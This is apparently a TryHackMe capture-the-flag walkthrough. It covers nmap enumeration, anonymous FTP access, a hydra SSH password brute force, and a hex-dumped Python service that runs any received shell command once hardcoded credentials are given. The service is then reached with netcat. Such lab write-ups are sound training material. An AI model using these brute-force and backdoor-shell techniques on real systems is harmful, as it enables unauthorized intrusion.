Work From Home| Tryhackme | Easy

 

Work From Home

Task 1 : Enumeration

 

nmap -sV -sC -p- 10.10.182.88

┌──(root㉿kali)-[/home/local_host/Desktop]
└─# nmap -sV -sC -p- --min-rate=500 10.10.182.88
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-02 12:38 EST
Nmap scan report for 10.10.182.88
Host is up (0.19s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT     STATE  SERVICE  VERSION
20/tcp   closed ftp-data
21/tcp   open   ftp      vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.18.101.59
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--    1 ftp      ftp            28 Jan 02 14:29 flag.txt
|_-rwxr-xr-x    1 ftp      ftp           627 Jan 02 14:29 request_letter.txt
22/tcp   open   ssh      OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 80c0a8a4eb6f607b097756855e7d998d (RSA)
|   256 c2c82650996e03a23dd7937d70e6af01 (ECDSA)
|_  256 25a640ab2d2819c86bea5aeb87a2ab03 (ED25519)
7309/tcp open   swx?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, LANDesk-RC, LPDString, NotesRPC, RTSPRequest, SIPOptions, X11Probe, afp, giop:

Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 354.11 seconds

Here we can see that FTP and SSH is open lets try anonymous login on FTP

┌──(local_host㉿kali)-[~/Desktop]
└─$ ftp 10.10.182.88
Connected to 10.10.182.88.
220 (vsFTPd 3.0.3)
Name (10.10.182.88:local_host): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>

By looking around we got one flag.txt and request_letter.txt unfortunately it was a fake flag!

ftp> ls
229 Entering Extended Passive Mode (|||55603|)
150 Here comes the directory listing.
-rw-r--r--    1 ftp      ftp            28 Jan 02 14:29 flag.txt
-rwxr-xr-x    1 ftp      ftp           627 Jan 02 14:29 request_letter.txt
226 Directory send OK.
ftp> 

By inspecting request_letter.txt it we can conclude that a user local_host is requesting for remote access that means ssh

Let’s Try ssh bruteforce on local_host using hydra

hydra -l local_host -P /usr/share/wordlists/rockyou.txt 10.10.182.88 ssh

┌──(root㉿kali)-[/home/local_host/Desktop]
└─# hydra -l local_host -P /usr/share/wordlists/rockyou.txt 10.10.182.88 ssh

Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-02 12:47:11
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.10.182.88:22/
[22][ssh] host: 10.10.182.88   login: local_host   password: sun*****
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-01-02 12:47:20

SSH login

ssh local_host@10.10.182.88

┌──(root㉿kali)-[/home/local_host/Desktop]
└─# ssh local_host@10.10.182.88
local_host@10.10.182.88's password: 
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.4.0-210-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

UA Infra: Extended Security Maintenance (ESM) is not enabled.

0 updates can be applied immediately.

157 additional security updates can be applied with UA Infra: ESM
Learn more about enabling UA Infra: ESM service for Ubuntu 16.04 at
https://ubuntu.com/16-04

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

New release '18.04.6 LTS' available.
Run 'do-release-upgrade' to upgrade to it.


Last login: Mon Jan  2 17:18:22 2023 from 10.18.101.59
local_host@ubuntu-xenial:~$

local_host@ubuntu-xenial:~$ pwd
/home/local_host
local_host@ubuntu-xenial:~$ ls
user.txt
local_host@ubuntu-xenial:~$ cat user.txt
THM{Cr1tic4l_1n*******************
local_host@ubuntu-xenial:~$

By looking at other directories we found that there’s an another user called manager

By searching for hidden directories in manager’s home directory i found a code_hexdumps.txt

local_host@ubuntu-xenial:/home/manager$ ls -la
total 16
drwxr-xr-x 2 manager manager 4096 Jan  2 14:29 .
drwxr-xr-x 4 root    root    4096 Jan  2 14:29 ..
-rwxr-xr-x 1 root    root    4652 Jan  2 14:29 .code_hexdumps.txt
local_host@ubuntu-xenial:/home/manager$

23212f7573722f62696e2f656e7620707974686f6e0d0a0d0a696d706f7274207379730d0a696d706f72742074657874777261700d0a696d706f727420736f636b65747365727665720d0a696d706f727420737472696e670d0a696d706f727420726561646c696e650d0a696d706f727420746872656164696e670d0a66726f6d2074696d6520696d706f7274202a0d0a696d706f727420676574706173730d0a696d706f7274206f730d0a696d706f72742073756270726f636573730d0a0d0a757365726e616d65203d20226b6964646f220d0a70617373776f7264203d202235773333745f48306d335f313237303031220d0a0d0a636c617373205365727669636528736f636b65747365727665722e426173655265717565737448616e646c6572293a0d0a20202020202020206465662061736b5f63726564656e7469616c732873656c66293a0d0a20202020202020202020202020202020757365725f696e707574203d2073656c662e72656365697665286222456e7465722074686520757365726e616d65203a2022292e6465636f646528227574662d3822292e737472697028290d0a20202020202020202020202020202020706173735f696e707574203d2073656c662e72656365697665286222456e746572207468652070617373776f72643a2022292e6465636f646528227574662d3822292e737472697028290d0a0d0a20202020202020202020202020202020696620757365725f696e707574203d3d20757365726e616d6520616e6420706173735f696e707574203d3d2070617373776f72643a0d0a20202020202020202020202020202020202020202020202072657475726e20547275650d0a20202020202020202020202020202020656c73653a0d0a20202020202020202020202020202020202020202020202072657475726e2046616c73650d0a0d0a20202020202020206465662068616e646c652873656c66293a0d0a0d0a202020202020202020202020202020206c6f67676564696e203d2073656c662e61736b5f63726564656e7469616c7328290d0a202020202020202020202020202020206966206e6f74206c6f67676564696e3a0d0a20202020202020202020202020202020202020202020202073656c662e73656e6428622257726f6e672063726564656e7469616c7320212054727920616761696e22290d0a20202020202020202020202020202020202020202020202072657475726e0d0a0d0a2020202020202020202020202020202073656c662e73656e642862225375636365737366756c6c79204c6f6767656420696e212022290d0a0d0a202020202020202020202020202020207768696c6520313a0d0a202020202020202020202020202020202020202020202020636f6d6d616e64203d2073656c662e726563656976652862226b616c69406c6f63616c5f686f7374242022290d0a20202020202020202020202020202020202020202020202023206f732e73797374656d28636f6d6d616e64290d0a20202020202020202020202020202020202020202020202070203d2073756270726f636573732e506f70656e28636f6d6d616e642c207368656c6c3d547275652c207374646f75743d73756270726f636573732e504950452c207374646572723d73756270726f636573732e50495045290d0a20202020202020202020202020202020202020202020202073656c662e73656e6428702e7374646f75742e726561642829290d0a20202020202020206465662073656e642873656c662c20737472696e672c206e65776c696e653d54727565293a0d0a202020202020202020202020202020206966206e65776c696e653a0d0a202020202020202020202020202020202020202020202020737472696e67203d20737472696e67202b2062225c6e220d0a2020202020202020202020202020202073656c662e726571756573742e73656e64616c6c28737472696e67290d0a0d0a202020202020202064656620726563656976652873656c662c2070726f6d70743d62223e2022293a0d0a2020202020202020202020202020202073656c662e73656e642870726f6d70742c206e65776c696e653d46616c7365290d0a2020202020202020202020202020202072657475726e2073656c662e726571756573742e726563762834303936292e737472697028290d0a0d0a0d0a636c61737320546872656164656453657276696365280d0a2020202020202020736f636b65747365727665722e546872656164696e674d6978496e2c0d0a2020202020202020736f636b65747365727665722e5443505365727665722c0d0a2020202020202020736f636b65747365727665722e446174616772616d5265717565737448616e646c65722c0d0a293a0d0a2020202020202020706173730d0a0d0a0d0a646566206d61696e28293a0d0a0d0a20202020202020207072696e7428225374617274696e6720736572766572202e202e202e202e202e202e202e202e202e202e22290d0a2020202020202020706f7274203d20373330390d0a2020202020202020686f7374203d2022302e302e302e30220d0a0d0a202020202020202073657276696365203d20536572766963650d0a2020202020202020736572766572203d205468726561646564536572766963652828686f73742c20706f7274292c2073657276696365290d0a20202020202020207365727665722e616c6c6f775f72657573655f61646472657373203d20547275650d0a0d0a20202020202020207365727665725f746872656164203d20746872656164696e672e546872656164287461726765743d7365727665722e73657276655f666f7265766572290d0a0d0a20202020202020207365727665725f7468726561642e6461656d6f6e203d20547275650d0a20202020202020207365727665725f7468726561642e737461727428290d0a0d0a20202020202020207072696e7428225365727665722073746172746564204f6e21202022202b20737472287365727665722e7365727665725f6164647265737329202b20222122290d0a0d0a0d0a20202020202020207768696c6520547275653a0d0a20202020202020202020202020202020736c6565702835290d0a0d0a0d0a6966205f5f6e616d655f5f203d3d20225f5f6d61696e5f5f223a0d0a20202020202020206d61696e28290d0a

by converting hex to string we got the complete python programm!! of the service hex to string convertor

In that code we also got the user name and the password of the service runnig on!

To detect which service is running we can check by

systemctl --type=service --state=active

It says that cmd.service is active and running

by inspecting the code thurrrrroughly we get that the server is running on port number 7039

let’s try netcat on that

nc 10.10.182.88 7039

BOOOM!! Congragulations!!

local_host@ubuntu-xenial:/$ nc 10.10.182.88 7309
Enter the username : ****
Enter the password: *******************
Successfully Logged in! 

Here you go You did it!!

Congragulations

THM{C4ptur3d-7***********************
kali@local_host$